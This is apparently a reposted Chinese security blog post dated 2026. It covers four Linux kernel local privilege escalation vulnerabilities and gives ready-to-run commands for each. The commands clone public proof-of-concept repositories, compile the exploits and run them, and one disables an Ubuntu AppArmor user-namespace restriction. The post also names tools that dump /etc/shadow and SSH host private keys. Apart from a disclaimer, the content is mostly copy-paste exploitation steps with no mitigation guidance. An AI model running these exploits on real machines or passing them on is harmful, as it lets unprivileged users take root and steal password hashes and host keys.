文章总结： 文档介绍了2026年出现的四个Linux内核本地提权漏洞及其PoC利用方法：CVE-2026-31431（CopyFail漏洞，Python一键提权）、CVE-2026-43284（DirtyFrag漏洞，通过内核网络路径污染页缓存）、CVE-2026-46300（Fragnesia漏洞，Ubuntu需调整AppArmor配置）、CVE-2026-46333（ssh-keysign漏洞，可读取敏感文件）。文章提供了各漏洞的复现命令和GitHubPoC地址，同时声明仅供授权测试使用。 综合评分： 70 文章分类： 漏洞分析,漏洞POC,漏洞预警,二进制安全,Linux内核

2026年Linux 内核本地提权漏洞（附有poc）

原创

meeyou meeyou

three安全之路

2026年6月4日 16:07 四川

在小说阅读器读本章

去阅读

本公众号（three安全之路）所发布的技术文章，工具及研究内容仅供参考，所提供的信息仅供网络安全从业者、授权安全测试人员对自己所负责的网络资产、信息系统及相关设备进行安全防护。利用本公众号所提供的技术信息、工具或方案而造成的直接或间接后果、经济损失及法律责任，均由使用者本人自行承担。本公众号及作者不承担由此产生的任何连带责任。

| | | | — | — | | 1 | linux内核提权 |

2026年ai起来，爆出的漏洞也是越来越多了，我写了几个大多客户—-要求的linux提权漏洞修复。

| | | | — | — | | 2 | *提权-Copy Fail：CVE-2026-31431* |

我个人觉得这个提权最丝滑，python3一运行欧克了，都不需要再次编译。

命令

python3 copy_fail_exp.py

我用的是Linux ubuntu 6.8.0版本，乎所有主流 Linux 发行版均受影响。

| | | | — | — | | 3 | 提权-Dirty Frag：CVE-2026-43284 |

这个也不错。Fragnesia 和 Dirty Frag 很像，都是通过内核网络路径造成页缓存污染

命令：

git clone https://github.com/V4bel/dirtyfrag.git&& cd dirtyfrag && gcc -O0 -Wall -o exp exp.c -lutil && ./exp

| | | | — | — | | 4 | 提权-Fragnesia：CVE-2026-46300 |

命令：

git clone https://github.com/v12-security/pocs.git&& cd pocs/fragnesia && gcc -o exp fragnesia.c && ./exp

直接编译后运行会失败

ubantu版本需要运行这个命令

sudo sysctl -w kernel.apparmor_restrict_unprivileged_userns=0

但这个命令又需要密码，所有ubantu用这个提权比较鸡肋。

其他linux版本好像不需要，我没试了。

| | | | — | — | | 5 | 提权-ssh-keysign-pwn：CVE-2026-46333 |

命令：

git clone https://github.com/0xdeadbeefnetwork/ssh-keysign-pwn

然后gcc一下得到四个执行程序 主要是这两个

chage_pwn             读取/etc/shadow文件。sshkeysign_pwn        读取SSH主机私钥（/etc/ssh/ssh_host*_key）

| | | | — | — | | 6 | poc地址 |

所有poc，github都可以下载。

懒得下载的后台回复：20260604获取所有文件。

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：three安全之路 meeyou meeyou《2026年Linux 内核本地提权漏洞（附有poc）》